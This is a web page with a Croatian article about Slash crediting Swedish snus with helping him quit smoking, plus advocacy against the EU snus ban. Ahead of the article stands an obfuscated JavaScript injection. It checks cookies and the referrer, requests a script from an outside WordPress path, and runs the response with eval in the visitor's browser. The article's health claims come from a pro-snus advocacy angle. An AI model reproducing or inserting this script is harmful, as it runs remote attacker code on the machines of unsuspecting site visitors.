;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Rock Legenda Slash o tome kako mu je snus pomogao da prestane pušiti

Zagovornik smanjenja štete od duhana i osnivač međunarodnog pokreta potrošača EUforsnus, koji nastoji pokazati Europskoj uniji da je trenutna zabrana snusa u EU-u štetna, upitao je Slasha o njegovom uspješnom putu prestanka pušenja putem snusa.

Snus je vlažni duhanski proizvod u prahu koji se stavlja ispod gornje usne na dulje vrijeme. Uglavnom je popularan u Švedskoj, Danskoj i Norveškoj, no legalan je samo u Švedskoj gdje se smatra učinkovitim proizvodom za smanjenje štete od duhana. Zapravo, snus ne samo da je doveo do toga da se Švedska može pohvaliti najnižom stopom pušenja u Europi, nego što je još važnije, i do izvještavanja o najnižim stopama raka pluća na cijelom kontinentu.

U tom smislu prošlog siječnja, švedska europarlamentarka Sara Skyttedal, koja je i dalje kritična prema kontinuiranoj nespremnosti EU-a da prepozna potencijal snusa i drugih sigurnijih nikotinskih alternativnih proizvoda, u smanjenju stope smrtnosti od duhana, službeno je Europskom povjereniku podnijela zastupnička pitanja u vezi s snusom.

Pitanja su nastala uoči objave Plana EU za borbu protiv raka u veljači, za koji mnogi stručnjaci tvrde da izostavlja vrlo ključne strategije smanjenja štete, kao što je uključivanje sigurnijih alternativa duhanu.

“Činjenica da Komisija ipak ustraje na stajalištu da snus uzrokuje rak je i iznenađujuća i, da budem iskrena, prilično nevjerojatna”, rekla je tada Skyttedal, kako je citira Snusforumet. “Ako se Direktiva o duhanskim proizvodima treba revidirati kako bi se uzela u obzir borba protiv raka, dijeli li Komisija mišljenje da EU treba promijeniti svoju regulativu o snusu?” upitala je Skyttedal povjerenika Kyriakidesa.

Svakako u prilog ovome stavu je Bengt Wiberg, osnivač zagovaračke grupe za smanjenje štete od duhana EU4snus, i izumitelj nove nagrađivane tehnologije vrećica, Sting Free AB. Kao što ime sugerira, ovaj je proizvod poznat po tome što olakšava prijelaz s pušenja na bezdimne niskorizične oralne proizvode, eliminirajući uobičajeni neugodan osjećaj peckanja, koji inače prati upotrebu takvih nikotinskih proizvoda.

Slash naziva snus “najboljim otkrićem na svijetu”

U radijskom intervjuu na popularnoj nordijskoj rock radio postaji Rockklassiker.se., entuzijast snusa zamolio je legendarnog gitarista Guns N’ Rosesa da podijeli svoje iskustvo o tome kako mu je snus pomogao da odustane od cigareta. “Bok Slash, mislim da je super što si prestao pušiti uz pomoć švedskog snusa! Možeš li nam reći više o tome? Podržavaš li ukidanje zabrane snusa u Europskoj uniji?

Rock legenda je istaknula da je otkriće snusa bilo ključno na njegovom putu prestanka pušenja i da je, nakon što je uspješno prestao pušiti, na kraju prestao koristiti snus. “Nekoć sam koristio snus. Koristio sam ga godinama i godinama i godinama i konačno sam prestao prije nekoliko godina, ali kada sam prvi put prestao pušiti, a to je bilo 2009. godine, ubrzo nakon toga sam otkrio snus i to je bilo kao najbolje otkriće na svijetu. Imao sam General snus, dostavljen iz Švedske.”

EU i dalje ignorira potencijal snusa

U međuvremenu, rad na planu EU-a za borbu protiv raka i dalje je u tijeku. Ironično, jedan od glavnih ciljeva plana je osigurati da manje od 5% stanovništva puši duhan do 2040. Ipak, EK inzistira na ignoriranju strategija koje je koristila prva zemlja koja je zapravo već postigla taj cilj.

“Mjesecima je Europska komisija izbjegavala temeljno pitanje. Naime, rješavanje inherentne kontradikcije između njihovih ciljeva u borbi protiv raka i njihovog pogleda na snus posebno, te njihove dvosmislenosti prema smanjenju štete općenito”, rekla je Sara Skyttedal u najnovijem intervjuu za Snusforumet.

“Učinila sam sve što sam mogla kako bih neprestano ukazivala na očito na sastancima s drugim donositeljima odluka u različitim dijelovima sustava EU: ako ozbiljno namjeravate učiniti nešto po pitanju smrtnosti uzrokovane duhanom, jednostavno je nemoguće zanemariti snus, s obzirom na što znamo o statistici duhana i raka.”

Choose your Reaction!
Leave a Comment